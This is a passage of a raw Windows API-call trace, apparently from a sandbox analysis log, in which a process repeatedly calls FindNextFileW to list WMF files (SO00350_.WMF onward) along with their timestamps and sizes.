ftLastAccessTime.dwLowDateTime=0x10339e29, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10339e29, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xbbe0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00350_.WMF", cAlternateFileName="")) returned 1 [0175.181] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10339e29, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10339e29, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10339e29, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x934c, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00352_.WMF", cAlternateFileName="")) returned 1 [0175.181] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10339e29, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10339e29, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10339e29, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1948, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00364_.WMF", cAlternateFileName="")) returned 1 [0175.181] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10313bcd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10313bcd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10339e29, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x51ea, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00367_.WMF", cAlternateFileName="")) returned 1 [0175.181] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10339e29, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10339e29, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10339e29, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3308, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00373_.WMF", cAlternateFileName="")) returned 1 [0175.181] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10339e29, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10339e29, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10360091, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x27f4, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00382_.WMF", cAlternateFileName="")) returned 1 [0175.182] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10339e29, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10339e29, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10339e29, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb7c, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00390_.WMF", cAlternateFileName="")) returned 1 [0175.182] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10339e29, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10339e29, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10339e29, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x828, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00391_.WMF", cAlternateFileName="")) returned 1 [0175.182] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10339e29, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10339e29, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10339e29, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x704e, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00416_.WMF", cAlternateFileName="")) returned 1 [0175.182] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10386305, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10386305, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10386305, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x143c, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00423_.WMF", cAlternateFileName="")) returned 1 [0175.182] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10339e29, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10339e29, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10339e29, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1544, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00444_.WMF", cAlternateFileName="")) returned 1 [0175.182] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10339e29, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10339e29, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10339e29, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x878, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00452_.WMF", cAlternateFileName="")) returned 1 [0175.182] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10339e29, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10339e29, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10339e29, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x59ec, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00453_.WMF", cAlternateFileName="")) returned 1 [0175.182] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10339e29, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10339e29, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10339e29, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb6c, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00454_.WMF", cAlternateFileName="")) returned 1 [0175.183] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103d2836, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103d2836, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103d2836, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xac8, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00466_.WMF", cAlternateFileName="")) returned 1 [0175.183] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10386305, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10386305, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10386305, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xfc0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00476_.WMF", cAlternateFileName="")) returned 1 [0175.183] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10360091, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10360091, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10360091, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5b08, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00479_.WMF", cAlternateFileName="")) returned 1 [0175.183] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10360091, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10360091, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10360091, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2bb8, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00483_.WMF", cAlternateFileName="")) returned 1 [0175.183] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10339e29, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10339e29, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10360091, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1e58, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00486_.WMF", cAlternateFileName="")) returned 1 [0175.183] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10339e29, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10339e29, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10360091, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xaa4, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00505_.WMF", cAlternateFileName="")) returned 1 [0175.183] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10339e29, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10339e29, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10360091, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1724, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00513_.WMF", cAlternateFileName="")) returned 1 [0175.184] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10339e29, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10339e29, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10339e29, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2602, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00555_.WMF", cAlternateFileName="")) returned 1 [0175.184] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10360091, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10360091, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10360091, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6260, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00603_.WMF", cAlternateFileName="")) returned 1 [0175.184] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10339e29, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10339e29, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10339e29, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9c80, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00610_.WMF", cAlternateFileName="")) returned 1 [0175.184] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10360091, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10360091, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10360091, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xfe6, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00629_.WMF", cAlternateFileName="")) returned 1 [0175.184] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10360091, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10360091, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10360091, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5006, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00633_.WMF", cAlternateFileName="")) returned 1 [0175.184] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10360091, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10360091, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10360091, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1aba, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00638_.WMF", cAlternateFileName="")) returned 1 [0175.184] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10360091, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10360091, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10360091, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x584, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00656_.WMF", cAlternateFileName="")) returned 1 [0175.184] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10360091, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10360091, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10360091, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1652, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00668_.WMF", cAlternateFileName="")) returned 1 [0175.185] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10360091, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10360091, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10360091, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x16c0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00670_.WMF", cAlternateFileName="")) returned 1 [0175.185] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10360091, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10360091, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10360091, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5d0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00671_.WMF", cAlternateFileName="")) returned 1 [0175.185] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10360091, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10360091, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10360091, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x62b6, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00683_.WMF", cAlternateFileName="")) returned 1 [0175.185] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10360091, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10360091, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10360091, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6302, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00694_.WMF", cAlternateFileName="")) returned 1 [0175.185] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10360091, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10360091, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10360091, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3636, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00704_.WMF", cAlternateFileName="")) returned 1 [0175.185] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10386305, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10386305, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10386305, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x16478, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00726_.WMF", cAlternateFileName="")) returned 1 [0175.185] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10386305, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10386305, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10386305, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1758, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00728_.WMF", cAlternateFileName="")) returned 1 [0175.185] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10386305, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10386305, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10386305, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x13fc, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00732_.WMF", cAlternateFileName="")) returned 1 [0175.186] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10386305, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10386305, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10386305, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x660, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00734_.WMF", cAlternateFileName="")) returned 1 [0175.186] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10386305, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10386305, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10386305, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5cc, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00735_.WMF", cAlternateFileName="")) returned 1 [0175.186] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10386305, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10386305, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10386305, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x184c, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00736_.WMF", cAlternateFileName="")) returned 1 [0175.186] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10386305, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10386305, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10386305, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x543a, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00768_.WMF", cAlternateFileName="")) returned 1 [0175.186] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10386305, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10386305, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10386305, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x16ee, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00783_.WMF", cAlternateFileName="")) returned 1 [0175.186] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10360091, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10360091, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10360091, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x41c2, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00820_.WMF", cAlternateFileName="")) returned 1 [0175.186] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10360091, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10360091, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10360091, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x28ae, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00828_.WMF", cAlternateFileName="")) returned 1 [0175.186] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10386305, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10386305, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10386305, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x36da, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00834_.WMF", cAlternateFileName="")) returned 1 [0175.187] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10386305, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10386305, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10386305, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3fe8, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00837_.WMF", cAlternateFileName="")) returned 1 [0175.187] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103ac532, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103ac532, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103ac532, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1898, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00910_.WMF", cAlternateFileName="")) returned 1 [0175.187] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10386305, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10386305, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10386305, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x29f8, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SO00911_.WMF", cAlternateFileName="")) returned 1 [0175.187] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103f89f0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103f89f0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103f89f0, 